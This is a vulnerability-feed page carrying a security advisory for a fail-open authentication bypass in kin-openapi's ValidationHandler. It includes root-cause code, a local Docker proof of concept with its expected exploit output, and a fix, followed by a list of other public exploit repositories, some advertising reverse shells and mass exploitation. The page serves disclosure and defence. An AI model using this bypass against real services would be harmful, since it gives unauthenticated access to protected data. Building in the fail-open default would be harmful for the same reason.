Feed/GHSA-r277-6w6q-xmqw
GHSA-r277-6w6q-xmqwCRITICALCVSS 9.1

kin-openapi: ValidationHandler.Load() Fail-Open Authentication Bypass via NoopAuthenticationFunc Default

Published Jul 24, 2026·Updated Aug 14, 2026

NVD Description

### Summary `ValidationHandler.Load()` in `getkin/kin-openapi` silently replaces a nil `AuthenticationFunc` with `NoopAuthenticationFunc`, which always returns `nil` without performing any credential check. Because this substitution happens unconditionally when the caller omits the field, every OpenAPI `security` requirement declared in the spec is silently satisfied for unauthenticated requests. An unauthenticated remote attacker can reach handlers for routes whose OpenAPI operation requires an API key, OAuth token, or any other security scheme if the application relies on `ValidationHandler` as its enforcement middleware. ### Details `ValidationHandler` is an HTTP middleware exported by `openapi3filter` that validates incoming requests and responses against a loaded OpenAPI specification. Its `Load()` method initialises default fields before the handler begins serving: ```go // openapi3filter/validation_handler.go:47-49 if h.AuthenticationFunc == nil { h.AuthenticationFunc = NoopAuthenticationFunc } ``` `NoopAuthenticationFunc` is defined as: ```go // openapi3filter/validation_handler.go:17-18 func NoopAuthenticationFunc(context.Context, *AuthenticationInput) error { return nil } ``` It always returns `nil`, meaning every security scheme check it handles is automatically approved. When a request arrives, `ServeHTTP` → `before` → `validateRequest` assembles a `RequestValidationInput` with the current `AuthenticationFunc` (now the no-op) injected into `Options`: ```go // openapi3filter/validation_handler.go:91-103 options := &Options{ AuthenticationFunc: h.AuthenticationFunc, } requestValidationInput := &RequestValidationInput{ Request: r, PathParams: pathParams, Route: route, Options: options, } if err = ValidateRequest(r.Context(), requestValidationInput); err != nil { return err } ``` Inside `ValidateRequest`, each security requirement calls `options.AuthenticationFunc`: ```go // openapi3filter/validate_request.go:436-438 f := options.AuthenticationFunc if f == nil { return ErrAuthenticationServiceMissing // fail-closed path — never reached via ValidationHandler } // ... // openapi3filter/validate_request.go:497-503 if err := f(ctx, &AuthenticationInput{...}); err != nil { return err } ``` Because `f` is the no-op (not `nil`), the `ErrAuthenticationServiceMissing` guard is never triggered and `f(...)` returns `nil`, clearing the security requirement. Control then proceeds to the protected handler (`validation_handler.go:61-62`). The critical contradiction is that callers who use `ValidateRequest` directly with a nil `AuthenticationFunc` get fail-closed behavior (`ErrAuthenticationServiceMissing`), while callers who use the higher-level `ValidationHandler` with a nil `AuthenticationFunc` get fail-open behavior. Since omitting `AuthenticationFunc` is the natural default, the majority of real-world integrations are vulnerable. Affected source file and line: `openapi3filter/validation_handler.go:47–49` (commit `30e2923`, tag `v0.143.0`). ### PoC **Environment** ``` Docker (any version supporting multi-stage builds) Go 1.25 (inside the container via golang:1.25-alpine) getkin/kin-openapi v0.143.0 (local source copy) ``` **Step 1 — Build the Docker image** From the repository root (parent of `vuln-001/`): ```bash docker build \ -t vuln001-auth-bypass-poc \ -f vuln-001/Dockerfile \ reports/github_web_233_getkin__kin-openapi ``` The `Dockerfile` copies the local `kin-openapi` source into `/kin-openapi/` inside the image and builds a Go binary (`/poc-binary`) from `main.go`. The `go.mod` inside the image uses a `replace` directive pointing to `/kin-openapi`, so no network access to the Go module proxy is required. **Step 2 — Run the container** ```bash docker run --rm --network none vuln001-auth-bypass-poc ``` **Step 3 (alternative) — Use the Python helper** ```bash python3 vuln-001/poc.py --no-cleanup ``` **What the PoC does** `main.go` creates a temporary OpenAPI 3.0 spec that declares `GET /secret` as protected by an `apiKey` security scheme: ```yaml paths: /secret: get: security: - apiKey: [] components: securitySchemes: apiKey: type: apiKey name: X-Api-Key in: header ``` It then constructs a `ValidationHandler` **without** setting `AuthenticationFunc`, calls `Load()`, and sends a request with no `X-Api-Key` header: ```http GET /secret HTTP/1.1 Host: example.test # X-Api-Key header is intentionally absent ``` **Expected (vulnerable) output** ``` === CONTRAST: Direct ValidateRequest with nil AuthenticationFunc === Direct ValidateRequest (nil auth) => ERROR: security requirements failed: missing AuthenticationFunc -> Fail-CLOSED behavior confirmed: missing auth function is rejected === EXPLOIT: ValidationHandler.Load() with nil AuthenticationFunc === OpenAPI spec defines: security: [{apiKey: []}] on GET /secret ValidationHandler.AuthenticationFunc: NOT SET (nil) Load() will inject NoopAuthenticationFunc, which always returns nil Request: GET /secret (X-Api-Key header: absent) Response: status=200 body="SECRET_DATA\n" [EXPLOIT SUCCESS] Auth bypass confirmed! Protected resource /secret returned SECRET_DATA without credentials. ValidationHandler.Load() silently injected NoopAuthenticationFunc. Security requirement was bypassed. VULN-001 REPRODUCED. ``` The contrast block confirms fail-closed behavior when `ValidateRequest` is called directly. The exploit block confirms fail-open behavior through `ValidationHandler`. Status 200 and `SECRET_DATA` are returned without any credential. **Remediation patch** ```diff --- a/openapi3filter/validation_handler.go +++ b/openapi3filter/validation_handler.go @@ if h.Handler == nil { h.Handler = http.DefaultServeMux } - if h.AuthenticationFunc == nil { - h.AuthenticationFunc = NoopAuthenticationFunc - } if h.ErrorEncoder == nil { h.ErrorEncoder = DefaultErrorEncoder } ``` After this change, a nil `AuthenticationFunc` propagates into `ValidateRequest`, which returns `ErrAuthenticationServiceMissing` and rejects the request. Callers who genuinely want to skip authentication can still opt in explicitly: `h.AuthenticationFunc = openapi3filter.NoopAuthenticationFunc`. ### Impact This is an **authentication bypass** vulnerability (CWE-287). Any application that: 1. uses `openapi3filter.ValidationHandler` as its HTTP middleware, and 2. declares one or more `security` requirements in its OpenAPI specification, and 3. does **not** explicitly set `AuthenticationFunc`, is fully exposed. An unauthenticated remote attacker can send requests to any protected endpoint without supplying credentials; the middleware accepts the request and forwards it to the underlying handler as if authentication had succeeded. Affected parties include all Go services that adopt `ValidationHandler` as a drop-in validation layer and rely on OpenAPI `security` declarations for access control without adding a separate authentication layer upstream (e.g., an API gateway or reverse proxy). Because the insecure behavior is the default, developers following the "getting started" path are affected without any additional mistake. The confidentiality and integrity of data behind secured endpoints are both at high risk. Availability is not directly affected by this vulnerability. ### Reproduction artifacts #### `Dockerfile` ```dockerfile FROM golang:1.25-alpine # Install git (needed by go mod for some packages) RUN apk add --no-cache git WORKDIR /workspace # Copy the vulnerable kin-openapi repository as a local module replacement COPY repo/ /kin-openapi/ # Set up the PoC Go module RUN mkdir -p /workspace/poc WORKDIR /workspace/poc # Create go.mod that uses the local copy of the vulnerable kin-openapi RUN cat > go.mod <<'EOF' module kin-openapi-auth-bypass-poc go 1.25 require github.com/getkin/kin-openapi v0.143.0 replace github.com/getkin/kin-openapi => /kin-openapi EOF # Copy the PoC source (build context is the parent directory of vuln-001/) COPY vuln-001/main.go /workspace/poc/main.go # Resolve dependencies and build RUN go mod tidy && \ go build -o /poc-binary . # Run the PoC CMD ["/poc-binary"] ``` #### `poc.py` ```python #!/usr/bin/env python3 """ PoC for VULN-001: ValidationHandler.Load() Fail-Open Auth Bypass via NoopAuthenticationFunc Default Repository: getkin/kin-openapi v0.143.0 CWE: CWE-287 (Improper Authentication) CVSS: 9.1 (Critical) Vulnerability Summary: ValidationHandler.Load() silently replaces a nil AuthenticationFunc with NoopAuthenticationFunc. NoopAuthenticationFunc always returns nil (no error), so any OpenAPI security requirement passes without validation when the user forgets to set AuthenticationFunc. Contrast: ValidateRequest() with nil AuthenticationFunc returns ErrAuthenticationServiceMissing (fail-closed). ValidationHandler.Load() breaks this guarantee (fail-open). Usage: python3 poc.py [--build-dir <dir>] [--image <name>] [--no-cleanup] """ import argparse import os import subprocess import sys import json IMAGE_NAME = "vuln001-auth-bypass-poc" SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__)) REPO_DIR = os.path.join(os.path.dirname(SCRIPT_DIR), "repo") SUCCESS_MARKER = "[EXPLOIT SUCCESS]" EXPECTED_STATUS = "status=200" EXPECTED_BODY = 'body="SECRET_DATA\\n"' def run(cmd, **kwargs): """Run a shell command and return (returncode, stdout, stderr).""" print(f"[CMD] {' '.join(cmd)}") result = subprocess.run(cmd, capture_output=True, text=True, **kwargs) if result.stdout: print(result.stdout, end="") if result.stderr: print(result.stderr, end="", file=sys.stderr) return result.returncode, result.stdout, result.stderr def build_image(build_dir): """Build the Docker image containing the PoC binary.""" print("\n[*] Building Docker image ...") rc, stdout, stderr = run([ "docker", "build", "--build-arg", f"REPO_DIR={REPO_DIR}", "-t", IMAGE_NAME, "-f", os.path.join(build_dir, "Dockerfile"), # Build context is the reports root so both Dockerfile and repo/ are reachable os.path.dirname(build_dir), ]) if rc != 0: print(f"[ERROR] Docker build failed (exit {rc})", file=sys.stderr) sys.exit(rc) print("[*] Docker build succeeded.") return f"docker build -t {IMAGE_NAME} -f {os.path.join(build_dir, 'Dockerfile')} {os.path.dirname(build_dir)}" def run_container(): """Run the container and capture output.""" print("\n[*] Running PoC container ...") rc, stdout, stderr = run([ "docker", "run", "--rm", "--network", "none", # no network access needed IMAGE_NAME, ]) combined = stdout + stderr return rc, combined def evaluate(exit_code, output): """Determine whether the exploit was confirmed.""" passed = ( exit_code == 0 and SUCCESS_MARKER in output and EXPECTED_STATUS in output and EXPECTED_BODY in output ) return passed def cleanup_image(): """Remove the Docker image.""" print(f"\n[*] Removing Docker image {IMAGE_NAME} ...") run(["docker", "rmi", "-f", IMAGE_NAME]) def main(): global IMAGE_NAME parser = argparse.ArgumentParser(description="VULN-001 Auth Bypass PoC runner") parser.add_argument("--build-dir", default=SCRIPT_DIR, help="Directory containing Dockerfile and main.go") parser.add_argument("--image", default=IMAGE_NAME, help="Docker image name to build/run") parser.add_argument("--no-cleanup", action="store_true", help="Keep the Docker image after the run") args = parser.parse_args() IMAGE_NAME = args.image print("=" * 60) print("VULN-001 PoC: Auth Bypass via NoopAuthenticationFunc Default") print("=" * 60) print(f" Build dir : {args.build_dir}") print(f" Repo dir : {REPO_DIR}") print(f" Image : {IMAGE_NAME}") build_cmd = build_image(args.build_dir) run_cmd = f"docker run --rm --network none {IMAGE_NAME}" exit_code, output = run_container() if not args.no_cleanup: cleanup_image() passed = evaluate(exit_code, output) print("\n" + "=" * 60) if passed: print("[RESULT] PASS — Auth bypass CONFIRMED") print(" The protected handler returned SECRET_DATA without credentials.") print(" ValidationHandler.Load() injected NoopAuthenticationFunc silently.") else: print(f"[RESULT] FAIL — Exploit not confirmed (exit={exit_code})") print(f"\nContainer exit code : {exit_code}") print(f"Success marker found: {SUCCESS_MARKER in output}") print(f"Status 200 found : {EXPECTED_STATUS in output}") print(f"Secret body found : {EXPECTED_BODY in output}") # Exit with code that signals pass/fail sys.exit(0 if passed else 1) if __name__ == "__main__": main() ```

Affected Packages (1)

github.com/getkin/kin-openapiGO
Fixed in = 0.143.0

Public Exploits & PoCs100 found

PoC: YellowKey-BitLocker-CVE-2026-45585

YellowKey BitLocker recovery - bitlocker yellowkey, yellowkey bitlocker, CVE-2026-45585, yellowkey github, yellowkey vulnerability, yellowkey CVE, TPM, BitLocker recovery key backup, Windows 10/11, CLI GUI, portable audit tool. Download:🡇

13

PoC: cve-writeups-and-pocs

CVE-2026-80724 PoC + full write-up — Linux kernel ptp/vmclock read-only mapping becomes writable (VM_MAYWRITE). Discovered, reported & fixed by Abdifatah Suruur (suruurism)

1

PoC: CVE-2026-79483-FastGPT-NoSQL-Injection

FastGPT Community Edition NoSQL Injection PoC (CVE-2026-79483)

1

PoC: givewp-cve-2026-82222-rce-lab

Authorized Docker lab and clean PoC for validating CVE-2026-82222 RCE in GiveWP 4.16.5.1 and the 4.16.7.2 fix.

1

PoC: CVE-2026-19745

Learn how I found my first two CVEs by pure accident.

1

PoC: cve-2026-23989-opencloud-lab

Reproduction lab (A/B Docker) for CVE-2026-23989 — OpenCloud / ownCloud Infinite Scale public-link scope-validation bypass in Reva

1

PoC: CVE-2026-21962-Blog

CVE-2026-21962 Açığı için blog sayfası oluşturdum.

1

PoC: PoC-and-yara-rules-of-CVE-2025-59528-Flowise-has-Remote-Code-Execution-vulnerability

poc and yara rules

1

PoC: CVE-2026-72898

Metabase SQLi

1

PoC: CVE-2026-19478

GitLab Code injection

1

PoC: CVE-2026-75604

CVE-2026-75604 (Next.js Windows RCE) PoC - unauthenticated RCE via cache path traversal + forged Server Action; for authorized security testing

1

PoC: CVE-2026-19632

CVE-2026-19632 - TranslatePress One-Day PoC

1

PoC: CVE-2026-56705

CVE-2026-56705 - Adminer < 5.4.3 unauthenticated RCE via MSSQL PDO DSN injection (ODBC TraceFile arbitrary file write). PoC, Docker lab and negative test included.

1

PoC: CVE-2026-75604-poc

CVE-2026-75604 Next.js Windows RCE poc

1

PoC: cve-2026-67363-67364

Balboa form Command Injection POC

PoC: CVE-2026-76581-Detector

Safe passive detector for identifying WPMU DEV Dashboard versions affected by CVE-2026-76581.

PoC: htb-machine-ringdown

Detailed design & exploitation writeup for Ringdown—an original Debian/Asterisk vulnerable machine featuring CVE-2024-42365 (AMI), PJSIP pre-hash cracking, and Fail2ban POSIX ACL privilege escalation.

PoC: gha-lab-83342297e0

Authorized security-research lab reproducing CVE-2024-41127 (GHSA-wcjf-5464-4wq9): poisoned pipeline execution via artifact-controlled code injection in ci-failure-comment.yml. Snapshot of monkeytypegame/monkeytype @ deeea0f.

PoC: WP2Shell-Scanner

Read-only CLI to check whether a WordPress site is exposed to WP2Shell (CVE-2026-63030 / CVE-2026-60137)

PoC: phpBB-CVE-2026-48611

Automated PoC for CVE-2026-48611 — phpBB OAuth login_link authentication bypass

PoC: Project-CVE-2026-45833

CVE-2026-45833 ChromaDB

PoC: CitrixBleedCVE-2026-8452-2025-5777

CitrixBleed Exploit Tool - CVE-2025-5777 & CVE-2026-8452. Unauthenticated remote memory read from Citrix NetScaler ADC & Gateway. Steal admin session tokens, extract nsroot hashes, dump secrets, and bypass MFA. Python 3 exploit with full memory parsing.

PoC: CVE-2026-76581

CVE-2026-76581

PoC: drupalgeddon2-cve-lab

Drupalgeddon2 CVE-2018-7600 vulnerable Drupal 7 lab

PoC: shellshock-cve-lab

Shellshock CVE-2014-6271 vulnerable CGI lab

PoC: log4shell-cve-lab

Log4Shell CVE-2021-44228 vulnerable lab

PoC: CVE-2026-18741

PoC CVE-2026-18741

PoC: CVE-2026-12513

CVE-2026-12513 Vulnerability Advisory & PoC — Discovered by Huynh Kien Minh (MinhHK).

PoC: ghostlock-oppo-watch3pro

CVE-2026-43499 on OPPO Watch 3 Pro

PoC: cve-2026-82222-poc

Public PoC for CVE-2026-82222

PoC: zk-xml-probe

Static XML fixtures for authorized bug bounty testing of XML parser behaviour (CVE-2026-45071).

PoC: SOC335-CVE-2024-49138-Investigation

SOC investigation of a CVE-2024-49138 exploitation alert using log analysis, threat intelligence, and endpoint containment.

PoC: papercut-toolkit

#PaperCut CVE-2026-81578 + CVE-2026-82078 Defense Toolkit 2 3 A **defensive** toolkit to check and understand exposure to the chained

PoC: PaperCut-CVE-2026-81578-82078

Security research tool for PaperCut CVE-2026-81578 & CVE-2026-82078

PoC: vankyo-s30-bootloader-unlock

Vankyo MatrixPad S30 (Unisoc SC9863A) — Bootloader unlock via CVE-2022-38694 FDL1 method

PoC: CVE-2026-21962-Blog

CVE-2026-21962 Açığı için blog sayfası oluşturdum.

PoC: hdwebmobile-formula-pricing

WooCommerce plugin: safe formula-based product pricing, closing CVE-2026-4001's eval()-based RCE

PoC: CVE-2026-82286-gpt-crawler-Arbitrary-File-Write

CVE-2026-82286 — gpt-crawler <=1.5.1 unauthenticated arbitrary file write via outputFileName (POST /crawl). PoC + self-contained Docker lab. CVSS 8.6, CWE-22.

PoC: CVE-2026-24061-payload

A PoC exploit for CVE-2026-24061 - GNU InetUtils telnetd Argument Injection Authentication Bypass

PoC: CVE-2026-66384

CVE-2026-66384 - Draft or TODO

PoC: CVE-2026-33017-PoC-Reverse-Shell

CVE-2026-33017 PoC Reverse Shell

PoC: CVE-2026-33057---Mesop-Unauthenticated-RCE-PoC-and-yara-rules

CVE-2026-33057 - Mesop Unauthenticated RCE PoC and yara rules

PoC: CVE-2026-10036-speechbrain-rce

SpeechBrain < 1.1.1 checkpoint metadata RCE via unsafe PyYAML parsing of CKPT.yaml.

PoC: CVE-2025-55182-poc

I know you are probably here from Hack the Box, if so, yes this one actually works.

PoC: Project-CVE-2026-50751

IKEv1 VPN scanners, attempts a Check Point authentication-bypass exploit, and includes internal network scanning and reverse-shell features.

PoC: CTT-Enhanced-CVE-2026-46339-Exploit-Engine

A specialized Python framework that executes unauthenticated remote code execution via the 9Router Model Context Protocol (MCP) bridge by deploying a 33-layer temporal phase cascade, Riemann-Hadamard dispersion, and an 11 ns wedge filter to bypass traditional proxy and process-monitoring defenses.

PoC: Zimbra-CVE-2026-73570-Rules

Wazuh Rules for Detection Zimbra (CVE-2026-73570).

PoC: CVE-2022-46169

Cacti 1.2.22 unauthenticated command injection

PoC: CVE-2024-23897

Jenkins CVE-2024-23897 — CSRF-crumb aware PoC

PoC: CVE-2025-10952-ml-logger-AFR

PoC for CVE-2025-10952 — ml-logger unauthenticated arbitrary file read. CVSS 5.3

PoC: CVE-2026-65643

CVE-2026-65643 - Draft or TODO

PoC: cve-2023-23397-detection-lab

Detection and mitigation research lab for CVE-2023-23397 using network and endpoint security telemetry.

PoC: fastjson-cve

fastjson-cve-2026-16723

PoC: CVE-2026-23751-poc

Patched RemotingClient to exploit CVE-2026-23751 (Tungsten Automation - Kofax Capture Unauthenticated File Read/Write and SMB coercion via .NET HTTP Remoting)

PoC: CVE-2023-27350-CVE-2023-27351

CVE-2023-27350, CVE-2023-27351 - PaperCut - Draft or TODO

PoC: Project-CVE-2026-33017

CVE-2026-33017 - Langflow Unauthenticated RCE Exploit

PoC: CVE-2026-70463

Testing CVE-2026-70463 by Fyyre

PoC: 2025-Oracle-SSO-LDAP-Attack-Post-Incident-Written-Report

Post-incident report analyzing the Oracle Cloud SSO/LDAP supply chain attack (CVE-2021-35587). Details the exploitation of legacy server infrastructure, impact across 140,000+ cloud tenants, root-cause findings, and phased mitigation strategies.

PoC: CVE-2026-20131-Post-Incident-Written-Report

Post-incident report on CVE-2026-20131 (CVSS 10.0), a Cisco FMC insecure deserialization vulnerability exploited by Interlock ransomware. Details root-cause analysis, lateral movement tactics, and emergency containment strategies.

PoC: ghostlock-pfem10

GhostLock (CVE-2026-43499 / IonStack) research for OPPO Find X5 Pro (PFEM10): exploit chain, progress, blocker log, and OPPO 5-series kernel notes

PoC: htb-labs-connected

Hack The Box Connected machine write-up featuring enumeration, CVE-2025-57819 exploitation, reverse shell, and privilege escalation to root via FreePBX and incron.

PoC: spring-ai-sibling-loop-poc

Minimal reproduction for Spring AI ParagraphManager sibling self-loop OOM (incomplete fix of CVE-2026-47851)

PoC: mssharepoint-scanner

A scanner for CVE-2026-55040 and CVE-2026-63520, designed to determine whether the server is affected by these two CVEs.

PoC: weblogic

Oracle WebLogic Console unauthenticated auth bypass + RCE exploit (CVE-2020-14882 / CVE-2020-14750)

PoC: CVE-2021-27876-veritas-backup

Metasploit module: Veritas Backup Exec Agent SHA-auth NDMP remote code execution (CVE-2021-27876/27877/27878)

PoC: Project-CVE-2026-65351

For educational purposes

PoC: rmg-s9180-fzg1

Root My Galaxy SM-S9180 (dm3q) S9180ZHS8FZG1 payload port - CVE-2026-43499 + KernelSU LKM

PoC: hacktivity-vulns-exploits-lab

Writeup + CVE analysis + countermeasures for the Hacktivity 'Vulnerabilities, Exploits, and Remote Access Payloads' lab (netcat shells, Metasploit, CVE-2010-1240, CVE-2004-2687).

PoC: CVE-2026-55040-Mass-Exploit

CVE-2026-55040

PoC: Project-CVE-2026-75604

A Python-based exploitation framework for CVE-2026-75604 that enables authorized penetration testers to validate Next.js Windows cache traversal vulnerabilities. Deploys reverse shells and webshells via path traversal, with built-in target verification and proxy support for seamless integration into standard pentest workflows.

PoC: CVE-2026-18963

CVE-2026-18963 Keycloak Reset-Credentials State Bypass Detector

PoC: CVE-2015-3246

CVE-2015-3246

PoC: CVE-2015-5287

CVE-2015-5287

PoC: htb-labs-nexus

Hack The Box Nexus machine write-up covering reconnaissance, Gitea credential discovery, Krayin CRM exploitation via CVE-2026-38526, initial access, and privilege escalation through a vulnerable Gitea template synchronization service.

PoC: Cisco-CVE-2026-20303-More

CVE-2026-20303, CVE-2026-20304, CVE-2026-20310, CVE-2026-20312, CVE-2026-20313

PoC: CVE-Ubiquiti

CVE-2026-77542, CVE-2026-77543, CVE-2026-77545, CVE-2026-77550, CVE-2026-77551, CVE-2026-77552, CVE-2026-77553, CVE-2026-77554, CVE-2026-77557 - Draft or TODO

PoC: CVE-2026-18431

CVE-2026-18431 - Draft or TODO

PoC: CVE-2026-8467

CVE-2026-8467 - Draft or TODO

PoC: CVE-2026-50787

Security advisory for CVE-2026-50787: uncontrolled resource consumption in e-SIC Livre CAPTCHA generation leading to remote denial of service.

PoC: solarview-ics-vulnerability-analysis

Threat model and vulnerability analysis of Contec SolarView Compact (CVE-2022-29303)

PoC: CVE-2026-72898-metabase-sqli

Detector + root-cause analysis for CVE-2026-72898 (Metabase unauthenticated SQLi via reset_password)

PoC: By-Poloss..-..CVE-2026-18080

Poc CVE-2026-18080

PoC: CVE-2026-63520

POC pre-auth RCE on Sharepoint chain

PoC: f_hid-4.14-backports

Backports of three published f_hid fixes (incl. CVE-2026-31721, CVE-2026-31606) to an EOL Linux 4.14.190 Android vendor kernel, with on-device verification records.

PoC: chrome-vuln-scanner

Check for CVE-2026-79266. A use-after-free in the DevTools component allows arbitrary code execution inside the sandbox via a malicious Chrome extension leveraging social engineering.

PoC: CVE-2026-19912-CVE-2026-19913-CVE-2026-19914

CVE-2026-19912, CVE-2026-19913, CVE-2026-19914

PoC: CVE-2026-19632-POC

PoC for CVE-2026-19632 - TranslatePress – Multilingual <= 3.3.1 - Unauthenticated Account Takeover via Password Reset Link Disclosure

PoC: ghostlock-infinix-hot70

Proof-of-concept kernel exploit for GhostLock (CVE-2026-43499) on the Infinix Hot 70.

PoC: CVE-2025-2945-pgAdmin-RCE

PoC for CVE-2025-2945 — pgAdmin 4 authenticated eval() injection RCE, CVSS 9.9

PoC: CVE-2026-63072

CVE-2026-63072

PoC: CVE-2026-76904

PostGIS SQL Injection GeoTools

PoC: CVE-2014-085

ZooKeeper 未授权访问漏洞(CVE-2014-085)PoC 及靶场

PoC: hdwebmobile-photo-video-reviews

WooCommerce plugin: photo & video product reviews, closing CVE-2026-12684's unauthenticated-upload vulnerability class by construction

PoC: Exploit-CVE-2026-56705

CVE-2026-56705 — Adminer < 5.4.3 Unauthenticated RCE via MSSQL PDO DSN Injection

PoC: CVE-2026-73570

Zimbra SNMP Notification OS Command Injection — Unauthenticated RCE via SMTP exploit (Poc)

PoC: vivo-root-build

vivo/iQOO 提权 so 编译(CVE-2026-43499)

PoC: CVE-2026-72530-TrueConf-Sandbox-Escape-

Este repositorio contiene una demostración educativa de la mitigación y detección para **CVE-2026-72530**, una vulnerabilidad crítica de **Code Injection y Sandbox Escape** en TrueConf Server.

PoC: CVE-2021-41773-Exploit

CVE-2021-41773 Apache HTTP Server 2.4.49 Path Traversal to RCE Exploit

PoC: cve-2026-60004

CVE-2026-60004 es una vulnerabilidad crítica (CVSS 9.8) en Gitea que permite ejecución remota de código sin autenticación mediante el endpoint `/api/v1/repos/{owner}/{repo}/diffpatch`.

PoC: CVE-2026-68820_Mass_Exploit

CVE-2026-68820 — Mass Exploit Framework Edition.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

References

View on NVD Search GitHub Search Google

Get alerted for CVEs like this

Register your stack and get notified within minutes when a matching CVE drops.

Start monitoring free